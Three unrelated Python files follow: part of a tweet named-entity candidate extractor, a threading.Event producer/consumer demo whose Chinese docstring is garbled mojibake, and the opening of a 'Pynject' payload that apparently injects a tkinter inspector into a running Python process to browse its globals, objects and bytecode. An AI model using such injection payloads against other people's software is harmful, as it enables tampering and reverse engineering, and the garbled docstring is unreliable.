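# capCheck("@user") -> False (mentions skipped), capCheck("Obama") -> True,
# capCheck("2019") -> True (digit-initial kept), capCheck("banana") -> False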
# In[310]:
def title_check(self,ne_phrase):
title_flag=False
words=ne_phrase.phraseText.split()
for word in words:
if word.lower() in cachedTitles:
title_flag= True
break
ne_phrase.set_feature(ne.title,title_flag)
return ne_phrase
# In[311]:
def entity_info_check(self,ne_phrase):
flag1=False #has number
flag3=False
flag_ind=[] #is number
month_ind=[]
date_num_holder=[]
words=ne_phrase.phraseText.split()
for word in words:
word=(word.strip()).rstrip(string.punctuation).lower()
punct_flag=False
for char in word:
if ((char in string.punctuation)|(char in ['‘','’','“','”','…'])):
punct_flag=True
break
#if ((not word.isalpha())& (not "'s" in word) & (not "’s" in word)): '‘’"“”'
if ((not word.isalpha())& (not punct_flag)):
flag_ind+=[True]
if word.isdigit():
date_num_holder+=['num']
else:
date_num_holder+=['alpha']
else:
flag_ind+=[False]
if word in month_list:
month_ind+=[True]
date_num_holder+=['month']
elif word in day_list:
date_num_holder+=['day']
elif word in prep_list:
date_num_holder+=['preposition']
elif word in article_list:
date_num_holder+=['article']
else:
#print("=>"+word)
date_num_holder+=['string']
if True in flag_ind:
flag1=True
if True in month_ind:
flag3=True
ne_phrase.set_feature(ne.has_number,flag1)
ne_phrase.set_feature(ne.date_indicator,flag3)
ne_phrase.set_date_num_holder(date_num_holder)
return ne_phrase
# In[312]:
#removing commonly used expletives, enunciated chat words and other common words (like days of the week, common expressions)
def slang_remove(self,ne_phrase):
phrase=(ne_phrase.phraseText.strip()).rstrip(string.punctuation).lower()
p1= re.compile(r'([A-Za-z]+)\1\1{1,}')
match_lst = p1.findall(phrase)
if phrase in article_list:
return True
elif phrase in day_list:
return True
#elif phrase in month_list:
#return True
elif match_lst:
return True
else:
return False
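# Example (illustrative inputs): the repetition regex above matches enunciated
# chat words such as "looool" ("o" repeated) or "hahahaha" ("ha" repeated three
# or more times), so phrases reducing to such strings are filtered out here.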
# In[313]:
def apostrope_check(self,ne_phrase):
apostrophe="'s"
bad_apostrophe="’s"
phrase=(ne_phrase.phraseText.strip()).rstrip(string.punctuation).lower()
if (apostrophe in phrase):
if (phrase.endswith(apostrophe)):
ne_phrase.set_feature(ne.is_apostrophed,0)
else:
#print(phrase.find(apostrophe))
ne_phrase.set_feature(ne.is_apostrophed,phrase.find(apostrophe))
elif (bad_apostrophe in phrase):
if phrase.endswith(bad_apostrophe):
ne_phrase.set_feature(ne.is_apostrophed,0)
else:
#print(phrase.find(apostrophe))
ne_phrase.set_feature(ne.is_apostrophed,phrase.find(bad_apostrophe))
else:
ne_phrase.set_feature(ne.is_apostrophed,-1)
return ne_phrase
# In[314]:
def punctuation_check(self,ne_phrase):
holder=[]
punctuation_holder=[]
flag_holder=[]
phrase=(ne_phrase.phraseText.strip()).rstrip(string.punctuation).lower()
for i in range(len(phrase)):
if (phrase[i] in string.punctuation):
holder+=[i]
for i in holder:
if ((i<(len(phrase)-1)) & (phrase[i]=="'") & (phrase[i+1]=="s")):
flag_holder+=[False]
elif ((i==(len(phrase)-1)) & (phrase[i]=="'")):
flag_holder+=[False]
else:
flag_holder+=[True]
punctuation_holder+=[i]
#print(flag_holder)
ne_phrase.set_punctuation_holder(punctuation_holder)
if True in flag_holder:
ne_phrase.set_feature(ne.has_intermediate_punctuation,True)
else:
ne_phrase.set_feature(ne.has_intermediate_punctuation,False)
return ne_phrase
# In[315]:
def tense_check(self,ne_phrase):
words=(((ne_phrase.phraseText.strip()).rstrip(string.punctuation)).lower()).split()
verb_flag=False
adverb_flag=False
if (len(words)==1):
if words[0].endswith("ing"):
verb_flag=True
if words[0].endswith("ly"):
adverb_flag=True
ne_phrase.set_feature(ne.ends_like_verb,verb_flag)
ne_phrase.set_feature(ne.ends_like_adverb,adverb_flag)
return ne_phrase
# In[316]:
def capitalization_change(self,ne_element):
phrase=((ne_element.phraseText.lstrip(string.punctuation)).rstrip(string.punctuation)).strip()
val=-1
topic_indicator=False
p1= re.compile(r'[A-Z]*\s*[A-Z]{4,}[^A-Za-z]*\s+[A-Za-z]+') #BREAKING: Toronto Raptors
p2= re.compile(r'([A-Z]{1}[a-z]+)+[^A-Za-z]*\s+[A-Z]{4,}') #The DREAMIEST LAND
match_lst1 = p1.findall(phrase)
match_lst2 = p2.findall(phrase)
if (match_lst1):
if not phrase.isupper():
p3=re.compile(r'[A-Z]*\s*[A-Z]{4,}[^A-Za-z]*\s+')
val=list(p3.finditer(phrase))[-1].span()[1]
if(":" in phrase):
topic_indicator=True
ne_element.set_feature(ne.change_in_capitalization,val)
elif (match_lst2):
#print ("GOTIT2: "+phrase)
p3=re.compile(r'([A-Z]{1}[a-z]+)+')
val=list(p3.finditer(phrase))[-1].span()[1]
ne_element.set_feature(ne.change_in_capitalization,val)
else:
ne_element.set_feature(ne.change_in_capitalization,val)
ne_element.set_feature(ne.has_topic_indicator,topic_indicator)
return ne_element
def quoteProcess(self,unitQuoted, tweetWordList):
candidateString=""
retList=[]
matches=[]
quoteMatch=[]
final=[]
flag=False
#print(tweetWordList)
list1=list(map(lambda index: tweetWordList[index], unitQuoted))
candidateString=" ".join(list1)
#print("=>",candidateString)
# candidateString=""
# for index in range(len(unitQuoted)-1):
# candidateString+=tweetWordList[unitQuoted[index]]+" "
# candidateString+=tweetWordList[unitQuoted[-1]]
# print("=>",candidateString)
flagOne=False
flagTwo=False
flagThree=False
flagFour=False
p= re.compile(r'[^\S]*([\'].*?[\'])[^a-zA-Z0-9\s]*[\s]*')
p1=re.compile(r'[^\s]+([\'].*?[\'])[^\s]*')
p2=re.compile(r'[^\s]*([\'].*?[\'])[^\s]+')
indices= (list(p.finditer(candidateString)))
indices1= (list(p1.finditer(candidateString)))
indices2= (list(p2.finditer(candidateString)))
if((len(indices)>0) & (len(indices1)==0)& (len(indices2)==0)):
flagOne=True
if(not flagOne):
p= re.compile(r'[^\S]*([‘].*?[’])[^a-zA-Z0-9\s]*[\s]*')
p1=re.compile(r'[^\s]+([‘].*?[’])[^\s]*')
p2=re.compile(r'[^\s]*([‘].*?[’])[^\s]+')
indices= (list(p.finditer(candidateString)))
indices1= (list(p1.finditer(candidateString)))
indices2= (list(p2.finditer(candidateString)))
if((len(indices)>0) & (len(indices1)==0)& (len(indices2)==0)):
flagTwo=True
if((not flagOne)&(not flagTwo)):
p= re.compile(r'[^\S]*([“].*?[”])[^a-zA-Z0-9\s]*[\s]*')
p1=re.compile(r'[^\s]+([“].*?[”])[^\s]*')
p2=re.compile(r'[^\s]*([“].*?[”])[^\s]+')
indices= (list(p.finditer(candidateString)))
indices1= (list(p1.finditer(candidateString)))
indices2= (list(p2.finditer(candidateString)))
if((len(indices)>0) & (len(indices1)==0)& (len(indices2)==0)):
flagThree=True
if((not flagOne)&(not flagTwo)&(not flagThree)):
p= re.compile(r'[^\S]*([\"].*?[\"])[^a-zA-Z0-9\s]*[\s]*')
p1=re.compile(r'[^\s]+([\"].*?[\"])[^\s]*')
p2=re.compile(r'[^\s]*([\"].*?[\"])[^\s]+')
indices= (list(p.finditer(candidateString)))
indices1= (list(p1.finditer(candidateString)))
indices2= (list(p2.finditer(candidateString)))
if((len(indices)>0) & (len(indices1)==0)& (len(indices2)==0)):
flagFour=True
if (flagOne|flagTwo|flagThree|flagFour):
flag=True
for index in indices:
span= list(index.span())
#print(span[0])
quoteMatch.append([int(span[0]),int(span[1])])
matches+=[int(span[0]),int(span[1])]
#print(matches)
final+=[(candidateString[0:matches[0]],False)]
for i in range(len(matches)-1):
if([matches[i],matches[i+1]] in quoteMatch):
final+=[((candidateString[matches[i]:matches[i+1]]).strip(),True)]
else:
final+=[((candidateString[matches[i]:matches[i+1]]).strip(),False)]
final+=[(candidateString[matches[-1]:],False)]
final=list(filter(lambda strin: strin[0]!="",final))
final=list(map(lambda strin: (strin[0].strip(),strin[1]),final))
#print(final)
for unit in final:
lst=[]
unitsplit=list(filter(lambda unitString: unitString!='',unit[0].split()))
for splitunit in unitsplit:
lst+=[tweetWordList.index(splitunit,unitQuoted[0])]
retList+=[(lst,unit[1])]
else:
retList+=[(unitQuoted,False)]
#print(retList)
return retList
# In[318]:
def trueEntity_process(self,tweetWordList_cappos,tweetWordList):
combined=[]+cachedStopWords+cachedTitles+prep_list+chat_word_list+article_list+day_list
#returns list with position of consecutively capitalized words
#print(tweetWordList_cappos, tweetWordList)
output_unfiltered = self.consecutive_cap(tweetWordList_cappos,tweetWordList)
#print("==>",output_unfiltered)
#splitting at quoted units
output_quoteProcessed=[]
start_quote=[]
end_quote=[]
for unitQuoted in output_unfiltered:
unitout=self.quoteProcess(unitQuoted, tweetWordList)
#print("==>",unitout)
for elem in unitout:
mod_out=[]
out=elem[0]
flag=elem[1]
sflag=False
# quote characters handled here: ' ‘ ’ " “ ”
#print(out,flag)
if not (flag):
#for id in range(len(out)):
temp=[]
#print("::",out)
for index in out:
#print(index,tweetWordList[index])
word=(((tweetWordList[index].strip().strip('"‘’“”')).lstrip(string.punctuation)).rstrip(string.punctuation)).lower()
#print("=>"+word)
if (word):
if (word in combined):
if(len(out)==1):
temp.append(index)
else:
if (word not in prep_list)&(word not in article_list):
temp.append(index)
else:
sflag=True
#else:
#if ((index==0)||()):
#temp.append(index)
# else:
# print("here")
# else:
# print("here")
#print(temp)
for elem in temp:
out.remove(elem)
#out[id]=temp
lst=[]
for k, g in groupby(enumerate(out), lambda elem: elem[1]-elem[0]):
lst=list(map(itemgetter(1), g))
#print("==>",lst)
if(lst):
mod_out.append((lst,sflag,flag))
#print('==>',mod_out)
else:
mod_out=[(out,sflag,flag)]
#print(mod_out)
#print(mod_out)
if(mod_out):
output_quoteProcessed.extend(mod_out)
#print("=====>",output_quoteProcessed)
output= list(filter(lambda element: ((element[0]!=[0])&(element[0]!=[])), output_quoteProcessed))
#print(output)
#consecutive capitalized phrases
consecutive_cap_phrases1=list(map(lambda x: self.f(x[0],x[1],x[2],tweetWordList), output))
consecutive_cap_phrases=list(filter(lambda candidate:(candidate.phraseText!="JUST_DIGIT_ERROR"),consecutive_cap_phrases1))
#self.printList(consecutive_cap_phrases)
#implement the punctuation clause
ne_List_pc=self.flatten(list(map(lambda NE_phrase: self.punct_clause(NE_phrase), consecutive_cap_phrases)),[])
#self.printList(ne_List_pc)
#stopword removal and start-of-sentence
ne_List_pc_sr= list(map(lambda candidate: self.stopwordReplace(candidate), ne_List_pc))
ne_List_pc_checked= list(filter(lambda candidate: (candidate.position!=[0]), ne_List_pc_sr))
#implement title detection
#ne_List_titleCheck= list(map(lambda element: self.title_check(element), ne_List_pc_checked))
#implement slang check and remove
ne_List_slangCheck= list(filter(lambda element: not self.slang_remove(element), ne_List_pc_checked))
#implement apostrophe, tense and punctuation marker with final number check
#ne_List_apostropeCheck= list(map(lambda element: self.apostrope_check(element), ne_List_slangCheck))
#ne_List_punctuationCheck= list(map(lambda element: self.punctuation_check(element), ne_List_apostropeCheck))
ne_List_numCheck=list(filter(lambda candidate: not (candidate.phraseText.lstrip(string.punctuation).rstrip(string.punctuation).strip()).isdigit(), ne_List_slangCheck))
#ne_List_tenseCheck= list(map(lambda element: self.tense_check(element), ne_List_numCheck))
#tracking sudden change in capitalization pattern
#ne_List_capPatCheck= list(map(lambda element: self.capitalization_change(element), ne_List_tenseCheck))
#check on length
ne_List_lengthCheck= list(filter(lambda element: element.length<7, ne_List_numCheck))
ne_List_badWordCheck= list(filter(lambda element:((element.phraseText.strip().strip(string.punctuation).lstrip('‘’“”')).rstrip('‘’“”').lower()) not in combined, ne_List_lengthCheck))
ne_List_allCheck= list(filter(lambda element:(len((element.phraseText.strip().strip(string.punctuation).lstrip('‘’“”')).rstrip('‘’“”'))>1),ne_List_badWordCheck))
#ne_List_allCheck= list(filter(lambda element: (element.phraseText.lower() not in combined), ne_List_double_Check))
#q.put(ne_List_allCheck)
return ne_List_allCheck
#return ne_List_allCheck
# In[319]:
'''This is the main module. It is not written as an explicit function because the argument being passed
is not fixed. However, you can call this whole cell as a function and it will call the rest of the
functions in my module to extract candidates and features
'''
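#A minimal usage sketch (assuming the class name SatadishaModule and its extract
#method, as in the commented-out driver at the bottom of this file; the CSV name
#and column layout are placeholders):
'''
import pandas as pd
tweets = pd.read_csv("deduplicated_test.csv", header=0, index_col=0, encoding='utf-8', delimiter=';')
phase1 = SatadishaModule()
candidates = phase1.extract(tweets, 1) # runs candidate extraction plus feature checks
'''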
'''#reads input from the database file and converts to a dataframe. You can change this part accordingly and
#directly convert argument tuple to the dataframe'''
#Inputs: Collection.csv 500Sample.csv 3.2KSample.csv eric_trump.csv
#df_out.to_csv('TweetBase500.csv')
#--------------------------------------PHASE I---------------------------------------------------
# In[ ]:
#--------------------------------------PHASE II---------------------------------------------------
'''set1 = set(['Melania','Trump'])
set2 = set(['Donald','Trump'])
set3 = set(['Jared','Kushner'])
m1 = MinHash(num_perm=200)
m2 = MinHash(num_perm=200)
m3 = MinHash(num_perm=200)
for d in set1:
m1.update(d.encode('utf8'))
for d in set2:
m2.update(d.encode('utf8'))
for d in set3:
m3.update(d.encode('utf8'))
# Create LSH index
lsh = MinHashLSH(threshold=0.0, num_perm=200)
lsh.insert("m2", m2)
lsh.insert("m3", m3)
result = lsh.query(m1)
print("Approximate neighbours with Jaccard similarity", result)
candidates=["donald trump","melania trump", "obama","barack obama","barack"]
listofMinhash=[]
m=MinHash(num_perm=200)
candidate0=set(candidates[0].split())
for d in candidate0:
m.update(d.encode('utf8'))
listofMinhash.append(m)
lsh = MinHashLSH(threshold=0.0, num_perm=200)
lsh.insert("m2", m2)
for candidate in candidates[1:]:'''
# In[ ]:
'''
print ("Shingling articles...")
# The current shingle ID value to assign to the next new shingle we
# encounter. When a shingle gets added to the dictionary, we'll increment this
# value.
curShingleID = 0
# Create a dictionary of the articles, mapping the article identifier (e.g.,
# "t8470") to the list of shingle IDs that appear in the document.
candidatesAsShingleSets = {};
candidateNames = []
t0 = time.time()
totalShingles = 0
for k in range(0, len(sorted_NE_container.keys())):
# Read all of the words (they are all on one line) and split them by white space.
words = list(sorted_NE_container.keys())[k].split(" ")
# Retrieve the article ID, which is the first word on the line.
candidateID = k
# Maintain a list of all document IDs.
candidateNames.append(candidateID)
# 'shinglesInDoc' will hold all of the unique shingle IDs present in the current document.
#If a shingle ID occurs multiple times in the document,
# it will only appear once in the set (this is a property of Python sets).
shinglesInCandidate = set()
# For each word in the document...
for index in range(0, len(words)):
# Construct the shingle text by combining three words together.
shingle = words[index]
# Hash the shingle to a 32-bit integer.
#crc = binascii.crc32("")
crc = binascii.crc32(bytes(shingle, encoding="UTF-8")) & (0xffffffff)
# Add the hash value to the list of shingles for the current document.
# Note that set objects will only add the value to the set if the set
# doesn't already contain it.
shinglesInCandidate.add(crc)
# Store the completed list of shingles for this document in the dictionary.
#print(str(words)+": ")
#for i in shinglesInCandidate:
# print('0x%08x' %i)
candidatesAsShingleSets[candidateID] = shinglesInCandidate
# Count the number of shingles across all documents.
totalShingles = totalShingles + (len(words))
# Report how long shingling took.
print ('\nShingling ' + str(str(len(sorted_NE_container.keys()))) + ' candidates took %.2f sec.' % (time.time() - t0))
print ('\nAverage shingles per doc: %.2f' % (totalShingles / len(sorted_NE_container.keys())))
'''
# In[ ]:
'''
# =============================================================================
# Generate MinHash Signatures
# =============================================================================
numHashes=20
numCandidates=len(sorted_NE_container.keys())
# Time this step.
t0 = time.time()
print ('Generating random hash functions...')
# Record the maximum shingle ID that we assigned.
maxShingleID = 2**32-1
nextPrime = 4294967311
# Our random hash function will take the form of:
# h(x) = (a*x + b) % c
# Where 'x' is the input value, 'a' and 'b' are random coefficients, and 'c' is
# a prime number just greater than maxShingleID.
# Generate a list of 'k' random coefficients for the random hash functions,
# while ensuring that the same value does not appear multiple times in the
# list.
def pickRandomCoeffs(k):
# Create a list of 'k' random values.
randList = []
while k > 0:
# Get a random shingle ID.
randIndex = random.randint(0, maxShingleID)
# Ensure that each random number is unique.
while randIndex in randList:
randIndex = random.randint(0, maxShingleID)
# Add the random number to the list.
randList.append(randIndex)
k = k - 1
return randList
# For each of the 'numHashes' hash functions, generate a different coefficient 'a' and 'b'.
coeffA = pickRandomCoeffs(numHashes)
coeffB = pickRandomCoeffs(numHashes)
print ('\nGenerating MinHash signatures for all candidates...')
# List of documents represented as signature vectors
signatures =np.ndarray(shape=(20, numCandidates))
# Rather than generating a random permutation of all possible shingles,
# we'll just hash the IDs of the shingles that are *actually in the document*,
# then take the lowest resulting hash code value. This corresponds to the index
# of the first shingle that you would have encountered in the random order.
# For each document...
for candidateID in candidateNames:
# Get the shingle set for this document.
shingleIDSet = candidatesAsShingleSets[candidateID]
# The resulting minhash signature for this document.
signature = []
# For each of the random hash functions...
for i in range(0, numHashes):
# For each of the shingles actually in the document, calculate its hash code
# using hash function 'i'.
# Track the lowest hash ID seen. Initialize 'minHashCode' to be greater than
# the maximum possible value output by the hash.
minHashCode = nextPrime + 1
# For each shingle in the document...
for shingleID in shingleIDSet:
# Evaluate the hash function.
hashCode = (coeffA[i] * shingleID + coeffB[i]) % nextPrime
# Track the lowest hash code seen.
if hashCode < minHashCode:
minHashCode = hashCode
# Add the smallest hash code value as component number 'i' of the signature.
signature.append(minHashCode)
# Store the MinHash signature for this document.
#signatures.append(signature)
signatures[:,candidateID]=signature
# Calculate the elapsed time (in seconds)
elapsed = (time.time() - t0)
print(list(np.shape(signatures)))
print ("\nGenerating MinHash signatures took %.2fsec" % elapsed)
#print ('\nsignatures stored in a numpy array...')
# Creates a N x N matrix initialized to 0.
# Time this step.
t0 = time.time()
# For each of the test documents...
for i in range(10, 11):
#for i in range(0, numCandidates):
print(list(sorted_NE_container.keys())[i]+": ",end="")
# Get the MinHash signature for document i.
signature1 = signatures[i]
# For each of the other test documents...
for j in range(0, numCandidates):
if(j!=i):
# Get the MinHash signature for document j.
signature2 = signatures[j]
count = 0
# Count the number of positions in the minhash signature which are equal.
for k in range(0, numHashes):
count = count + (signature1[k] == signature2[k])
# Record the percentage of positions which matched.
estJSim= (count / numHashes)
#print(estJSim)
if (estJSim>=0.5):
print("=>"+list(sorted_NE_container.keys())[j]+", ",end="")
print()
# Calculate the elapsed time (in seconds)
elapsed = (time.time() - t0)
print ("\nComparing MinHash signatures took %.2fsec" % elapsed)'''
# In[ ]:
'''cap_phrases="Trump:Russia,Afgha"
words=re.split('[,:]', cap_phrases)
print(words)
candidateString='"BS'
p= re.compile(r'(".*?")[^\s]*[\s]*')
indices= (list( p.finditer(candidateString) ))
matches=[]
final=[]
if(indices):
for index in indices:
span= list(index.span())
#print(span[0])
matches+=[int(span[0]),int(span[1])]
print(matches)
final+=[candidateString[0:matches[0]]]
for i in range(len(matches)-1):
final+=[(candidateString[matches[i]:matches[i+1]]).strip()]
final+=[candidateString[matches[-1]:]]
final=list(filter(lambda strin: strin!="",final))
final=list(map(lambda strin: strin.strip(),final))
print(final)'''
# tweets=pd.read_csv("deduplicated_test.csv", header=0, index_col = 0 ,encoding = 'utf-8',delimiter=';')
# tweets=tweets[:1000:]
# Phase1= SatadishaModule()
# for i in range(2):
# Phase1= SatadishaModule()
# Phase1.extract(tweets,1)
|
ex05_event.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import time
import threading
from random import randint
"""
5. Event
- ไธไธช็บฟ็จๅ้/ไผ ้ไบไปถ๏ผ
- ๅฆๅค็็บฟ็จ็ญๅพ
ไบไปถ็่งฆๅใ
- ๅๆ ท็จใ็ไบง่
/ๆถ่ดน่
ใๆจกๅไธพไพ:
- ๅฏไปฅ็ๅฐไบไปถ, ่ขซ2ไธชๆถ่ดน่
, ๆฏ่พๅนณๅ็ๆฅๆถๅนถๅค็ไบใ
- ๅฆๆไฝฟ็จไบwaitๆนๆณ๏ผ็บฟ็จๅฐฑไผ็ญๅพ
ๆไปฌ่ฎพ็ฝฎไบไปถ๏ผ่ฟๆๅฉไบไฟ่ฏไปปๅกๅฎๆใ
- ๅค็่ฟ็จ:
- ็ไบง่
ไบง็ๆฐๆฎ:
- ไบง็ๆฐๆฎ, ๅนถๅ็ปๆถ่ดน่
(append ๅฐ็ผๅฒๅบ)
- ๆถ่ดน่
ๅค็ๆฐๆฎ:
- ๆถ่ดน่
็ๅฌไบไปถ, ไธๆญ่ฝฎ่ฏข.
- ๆฅๅๅฐๆฐๆฎ, ๅฐฑๅค็.(pop ๅๅบไธขๆ)
"""
TIMEOUT = 3
# Consumer:
def consumer(event, data):
thr = threading.currentThread()
fail_num = 0
# Loop forever
# - stop running after failing to receive data 5 times in a row
#
while True:
set_event = event.wait(TIMEOUT)
if set_event:
try:
digit = data.pop()
print("\t[{}]: receive {} , and handle.".format(thr.name, digit))
time.sleep(2)  # simulate time-consuming processing, so the work is shared fairly evenly.
event.clear()
except IndexError:
pass
else:
fail_num += 1
print("\t[{}]: receive nothing... [{}]".format(thr.name, fail_num))
if fail_num >= 5:
print("[{}]: thread is done.".format(thr.name))
break
# Producer:
def producer(event, data):
thr = threading.currentThread()
for i in range(1, 20):
digit = randint(10, 100)
data.append(digit)
print("[{} - {}] --> appended {} to list.".format(i, thr.name, digit))
event.set()
time.sleep(1)
print("\n[{}]: thread is done.".format(thr.name))
def run():
event = threading.Event()
data = []
threads = []
# Consumers:
for name in ("consumer1", "consumer2"):
thr = threading.Thread(name=name, target=consumer, args=(event, data))
thr.start()
threads.append(thr)
# Producer:
# - the producer must be started separately from the consumers
# - merging both into one for loop would raise an error
#
p = threading.Thread(name='producer1', target=producer, args=(event, data))
p.start()
threads.append(p)
for thr in threads:
thr.join()
print("run over.")
if __name__ == '__main__':
run()  # events produced by the producer are received and handled fairly evenly by the 2 consumers.
|
PynjectInspector.py
|
# PYNJECT STANDARD PAYLOAD COLLECTION - https://github.com/am-nobody/pynject/payloads
#
# Title: Pynject Inspector v1.0
# Author: am-nobody
# ================================
# Imports
# ================================
preserved = dict(globals())
import gc
import os
import sys
import dis
import threading
import subprocess
import importlib.util
# Force import the module if the application does not find it in its own path scope.
try:
import tkinter
from tkinter import ttk
from tkinter import font
except ImportError:
def force_load(name):
if (name in sys.modules):
del(sys.modules[name])
if (name in globals()):
del(globals()[name])
verstring = ("-" + str(sys.version_info[0]) + "." + str(sys.version_info[1]))
open((os.getcwd() + "\\temp.py"), "w+").write("import " + name + "\nprint(" + name + ".__file__)")
path = subprocess.check_output(["py", verstring, (os.getcwd() + "\\temp.py")])
os.remove((os.getcwd() + "\\temp.py"))
path = path.decode("utf-8").strip()
if (os.path.exists(path)):
spec = importlib.util.spec_from_file_location(name, path)
module = importlib.util.module_from_spec(spec)
sys.modules[name] = module
spec.loader.exec_module(module)
else:
raise ImportError("Failed to find module, install the proper version of python and this module on your system.")
force_load("tkinter")
del(force_load)
import tkinter
from tkinter import ttk
from tkinter import font
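# For reference, a standalone sketch of the manual-loading pattern force_load
# uses above (stdlib importlib.util; the module name and path are hypothetical):
#
#   import importlib.util, sys
#   spec = importlib.util.spec_from_file_location("mymod", "/path/to/mymod.py")
#   module = importlib.util.module_from_spec(spec)
#   sys.modules["mymod"] = module
#   spec.loader.exec_module(module)  # executes the module body, filling its namespace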
# ================================
# GUI
# ================================
class Inspector():
def __init__(self):
# Clean globals.
global preserved
self.preserved = preserved
del(preserved)
del(globals()["Inspector"])
# Setup vars.
self.moduleList = {}
# Initialize GUI.
self.width = 1000
self.height = 600
self.makeWidgets()
self.positionWidgets()
self.initialization()
self.launch()
# ================================
# Init Functions
# ================================
def makeWidgets(self):
# Frames
self.window = tkinter.Tk()
self.globalFrame = tkinter.Frame(self.window)
self.inspectorFrame = tkinter.Frame(self.window)
self.objectInstanceFrame = tkinter.Frame(self.window)
# Global frame items.
self.gTopFrame = tkinter.Frame(self.globalFrame)
self.gRefreshButton = tkinter.Button(self.gTopFrame, text="Refresh", command=lambda: self.populateGlobalTree(self.globalTree))
self.glabel = tkinter.Label(self.globalFrame, text="Global Symbol List")
self.gscroll_x = tkinter.Scrollbar(self.globalFrame, orient="horizontal")
self.gscroll_y = tkinter.Scrollbar(self.globalFrame)
self.globalTree = ttk.Treeview(self.globalFrame, yscrollcommand=self.gscroll_y.set, xscrollcommand=self.gscroll_x.set)
self.gRightClickMenu = tkinter.Menu(self.globalTree, tearoff=0)
# Inspector frame items.
self.inspectorTreeFrame = tkinter.Frame(self.inspectorFrame)
self.inspectorRefresh = tkinter.Button(self.inspectorTreeFrame, text="Refresh", command=lambda: self.populateInspectorTree(self.inspecting))
self.inspectorTreeLabel = tkinter.Label(self.inspectorTreeFrame, text="Instance Tree")
self.iScroll_x = tkinter.Scrollbar(self.inspectorTreeFrame, orient="horizontal")
self.iScroll_y = tkinter.Scrollbar(self.inspectorTreeFrame)
self.inspectorTree = ttk.Treeview(self.inspectorTreeFrame, yscrollcommand=self.iScroll_y.set, xscrollcommand=self.iScroll_x.set)
self.inspectorDisFrame = tkinter.Frame(self.inspectorFrame)
self.disLabel = tkinter.Label(self.inspectorDisFrame, text="Instance Disassembly")
self.disScroll_x = tkinter.Scrollbar(self.inspectorDisFrame, orient="horizontal")
self.disScroll_y = tkinter.Scrollbar(self.inspectorDisFrame)
self.disassemblyText = tkinter.Text(self.inspectorDisFrame, xscrollcommand=self.disScroll_x.set, yscrollcommand=self.disScroll_y.set)
self.iRightClickMenu = tkinter.Menu(self.inspectorTree, tearoff=0)
# Object type list items.
self.typeFrame = tkinter.Frame(self.objectInstanceFrame)
self.typeLabel = tkinter.Label(self.typeFrame, text="Object Types")
self.typeRefresh = tkinter.Button(self.typeFrame, text="Refresh", command=self.populateTypeList)
self.tscroll_y = tkinter.Scrollbar(self.typeFrame)
self.tscroll_x = tkinter.Scrollbar(self.typeFrame, orient="horizontal")
self.typeList = tkinter.Listbox(self.typeFrame, yscrollcommand=self.tscroll_y.set, xscrollcommand=self.tscroll_x.set, width=30)
self.tRightClickMenu = tkinter.Menu(self.typeList, tearoff=0)
# Instance list items.
self.objectTreeFrame = tkinter.Frame(self.objectInstanceFrame)
self.objectLabel = tkinter.Label(self.objectTreeFrame, text="Object Instances")
self.objectRefresh = tkinter.Button(self.objectTreeFrame, text="Refresh", command=lambda: self.populateObjectTree(self.objectTreeType))
self.oscroll_x = tkinter.Scrollbar(self.objectTreeFrame, orient="horizontal")
self.oscroll_y = tkinter.Scrollbar(self.objectTreeFrame)
self.objectTree = ttk.Treeview(self.objectTreeFrame, yscrollcommand=self.oscroll_y.set, xscrollcommand=self.oscroll_x.set)
self.oRightClickMenu = tkinter.Menu(self.objectTree, tearoff=0)
def positionWidgets(self):
# Frames.
self.window.rowconfigure(0, weight=1)
self.window.columnconfigure(0, weight=1)
self.globalFrame.grid(row=0, column=0, sticky="nesw")
self.objectInstanceFrame.grid(row=1, column=0, sticky="nesw")
self.inspectorFrame.grid(row=0, column=1, rowspan=3, sticky="ns")
# Global frame items.
self.globalFrame.columnconfigure(0, weight=1)
self.globalFrame.rowconfigure(1, weight=1)
self.glabel.grid(row=0, column=0, sticky="w")
self.gTopFrame.grid(row=0, column=1)
self.gRefreshButton.grid(row=0, column=1, sticky="ne")
self.globalTree.grid(row=1, column=0, columnspan=2, sticky="nesw")
self.gscroll_y.grid(row=1, column=2, sticky="ns")
self.gscroll_x.grid(row=2, column=0, columnspan=2, sticky="we")
# Inspector frame items.
self.inspectorFrame.columnconfigure(0, weight=1)
self.inspectorFrame.rowconfigure(0, weight=1)
self.inspectorTreeFrame.grid(row=0, column=0, sticky="nesw")
self.inspectorTreeFrame.columnconfigure(0, weight=1)
self.inspectorTreeFrame.rowconfigure(1, weight=1)
self.inspectorTreeLabel.grid(row=0, column=0, sticky="w")
self.inspectorRefresh.grid(row=0, column=0, sticky="e")
self.inspectorTree.grid(row=1, column=0, sticky="nesw")
self.iScroll_x.grid(row=2, column=0, sticky="we")
self.iScroll_y.grid(row=1, column=1, sticky="wns")
self.inspectorDisFrame.grid(row=1, column=0, sticky="nesw")
self.inspectorDisFrame.columnconfigure(0, weight=1)
self.inspectorDisFrame.rowconfigure(1, weight=1)
self.disLabel.grid(row=0, column=0, sticky="nw", pady=(0, 5))
self.disassemblyText.grid(row=1, column=0, sticky="nesw")
self.disScroll_x.grid(row=2, column=0, sticky="we")
self.disScroll_y.grid(row=1, column=1, sticky="wns")
# Object type list items.
self.typeFrame.columnconfigure(0, weight=1)
self.typeFrame.rowconfigure(1, weight=1)
self.typeFrame.grid(row=0, column=0, sticky="wns", padx=(0, 10))
self.typeLabel.grid(row=0, column=0, sticky="w")
self.typeRefresh.grid(row=0, column=1, sticky="e")
self.typeList.grid(row=1, column=0, columnspan=2, sticky="nesw")
self.tscroll_y.grid(row=1, column=2, sticky="ns")
self.tscroll_x.grid(row=2, column=0, columnspan=2, sticky="we")
# Instance list items.
self.objectInstanceFrame.rowconfigure(0, weight=1)
self.objectInstanceFrame.columnconfigure(1, weight=1)
self.objectTreeFrame.columnconfigure(0, weight=1)
self.objectTreeFrame.rowconfigure(1, weight=1)
self.objectTreeFrame.grid(row=0, column=1, sticky="nesw")
self.objectLabel.grid(row=0, column=0, sticky="w")
self.objectRefresh.grid(row=0, column=1, sticky="e")
self.objectTree.grid(row=1, column=0, columnspan=2, sticky="nesw")
self.oscroll_y.grid(row=1, column=2, sticky="ns")
self.oscroll_x.grid(row=2, column=0, columnspan=2, sticky="we")
def initialization(self):
# Frames.
self.window.title("Pynject Inspector v1.0")
self.window.bind('<Configure>', self.resize)
self.window.geometry(str(self.width) + "x" + str(self.height))
self.window.attributes('-topmost', 1)
self.globalFrame.config(height=(self.height * (5/8)), width=(self.width * (2/3)))
self.objectInstanceFrame.config(height=(self.height * (3/8)), width=(self.width * (2/3)))
self.inspectorFrame.config(width=(self.width * (1/3)))
# Global frame items.
self.style = ttk.Style(self.window)
